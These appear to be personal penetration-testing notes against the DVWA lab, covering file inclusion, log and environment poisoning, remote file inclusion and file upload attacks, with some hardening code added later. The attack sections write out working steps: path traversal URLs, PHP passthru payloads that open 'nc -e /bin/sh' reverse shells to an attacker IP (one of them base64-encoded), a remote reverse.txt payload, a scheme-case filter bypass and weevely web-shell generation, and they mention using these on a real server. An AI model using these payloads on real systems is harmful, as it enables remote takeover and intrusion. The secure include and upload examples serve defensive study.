File Inclusion

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd  --> to read the passwd file

-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION -- using environment variables
-------------------------------------------------------------------------------------------------------

cat /proc/self/environ --> shows the environment variables of the current process

Open the environment variables on the target machine:
 --> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ

Now intercept the request using Burp Suite -
in Burp Suite, change the browser name (the User-Agent header) in the request to PHP code: <?phpinfo()?>

type in command prompt
 --> nc -vv -l -p 8888
type in the Burp Suite request header (User-Agent)
 --> <?passthru("nc -e /bin/sh attacker_ip 8888"); ?>   // e.g. <?passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>



-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION -- using logs --> /var/log/auth.log
                                                        --> /var/log/apache2/access.log
-------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> /var/log/auth.log shows the authentication log

--> let's try to log in to the server with "ssh" and check the logs

ssh random@192.168.149.136
random
--> a log entry is written


ssh "<?passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP

need to convert the command into base64 --> nc -e /bin/sh attacker_ip 8888
--> open Burp Suite, go to Decoder and paste: nc -e /bin/sh attacker_ip 8888
--> copy the encoded string: bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4


ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP


 --> type in command prompt
nc -vv -l -p 8888


--> now open this:

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log

--> In Cmd type
 id
 ls
 pwd


===========================================================================================================
Remote File Inclusion - Low Security
===========================================================================================================

It is a special case of file inclusion vulnerabilities. If the server is configured with the allow_url settings
(allow_url_fopen / allow_url_include) enabled, we will be able to include any file from any computer into the
target computer. We can upload any PHP file and run payloads, reverse shells and system commands as well.


In DVWA, remote file inclusion is turned off; we need to turn it on:

sudo nano /etc/php5/cgi/php.ini
ctrl+w --> search for allow_url and set it to "On"
ctrl+x
yes
sudo /etc/init.d/apache2 restart


The file should be stored on a real server with an IP that is reachable from the target.


<?php
passthru("nc -e /bin/sh 192.168.149.128 8080");
?>

save it as reverse.txt in /var/www/html

open it at http://localhost/reverse.txt   --> it must be accessible remotely if you want to hack a real server

in cmd type
--> nc -vv -l -p 8080

run this now ...

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?

whoami
uname -a
ls
pwd


===========================================================================================================
Remote File Inclusion - Medium Security
===========================================================================================================
nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?   (note the mixed-case scheme)





Securing against remote file inclusion:


sudo nano /etc/php5/cgi/php.ini
ctrl+w --> search for allow_url and set it to "Off"
    allow_url_include = Off
ctrl+x
yes
sudo /etc/init.d/apache2 restart
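Turning allow_url_include off stops the remote case, but every local trick above (/etc/passwd, /proc/self/environ, the poisoned auth.log) works because the include path comes straight from ?page=. The following is an added example, not DVWA's own code: the vulnerable pattern next to an allow-list version, assuming the includable pages live in a pages/ directory beside the script.

```php
<?php
// Added example, not DVWA's own code: the vulnerable pattern behind ?page=
// next to a hardened version. Assumes the includable pages live in a
// pages/ directory beside this script.

// VULNERABLE: the request controls the path, so ../../../../etc/passwd,
// /proc/self/environ, a poisoned auth.log, or (with allow_url_include=On)
// http://<remote>/reverse.txt is included and executed.
function include_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: the request value is only a key into a fixed allow-list. No
// path, scheme or extension supplied by the client ever reaches include().
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
    'help'  => 'help.php',
];

function include_page_safe(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(400);
        exit('unknown page');
    }
    // Defence in depth: even a listed file must resolve inside pages/.
    $base = realpath(__DIR__ . '/pages');
    $full = $base === false ? false : realpath($base . '/' . PAGES[$page]);
    if ($full === false || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(500);
        exit('page misconfigured');
    }
    include $full;
}

// Runtime check matching the php.ini fix above: log loudly if remote
// includes are still enabled, since the allow-list is then the only barrier.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is On: remote file inclusion is possible');
}

include_page_safe($_GET['page'] ?? 'home');
```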






File upload vulnerability:
--------------------------
Generate a web payload and gain a remote connection or access:
--> weevely generate 12345 /root/Desktop/shell.php   // 12345 is the password
To run it
--> weevely link_of_shell password
change the extension of the file from php to jpg

modify the request using Burp Suite while uploading the file, changing the extension back from jpg to php
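The rename-to-jpg-then-edit-in-Burp trick works only when the server trusts the client's filename and nothing else. Added example, not DVWA's or weevely's code: an upload handler that checks the extension against an allow-list, sniffs the real content with finfo, decodes the image, and stores it under a server-chosen name outside the web root. It assumes a form field named "uploaded" and an uploads directory at /var/www/uploads.

```php
<?php
// Added example, not DVWA's own code. Assumes the form field is "uploaded"
// and /var/www/uploads is outside the web root (never served by Apache).

function store_image_upload(array $file, string $dest_dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // 1. Extension allow-list on the client filename. shell.jpg passes this
    //    step, which is exactly why it is not the only check.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // 2. Content sniffing: finfo ignores the name and the client-supplied
    //    Content-Type header, so editing either in Burp changes nothing here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException("content is $mime, not {$allowed[$ext]}");
    }
    // 3. The file must decode as an image; a PHP script named .jpg will not.
    //    A real JPEG with PHP hidden in a comment still passes, which is why
    //    step 4 stores it where the PHP interpreter never sees it.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // 4. Server-chosen name and validated extension, outside the web root,
    //    non-executable: nothing from the request reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dest_dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

try {
    $stored = store_image_upload($_FILES['uploaded'] ?? [], '/var/www/uploads');
    echo 'stored as ' . htmlspecialchars($stored);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'rejected: ' . htmlspecialchars($e->getMessage());
}
```

Stored files should then be served by a separate handler that reads them and sets the Content-Type itself, so the upload directory is never mapped to a URL.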
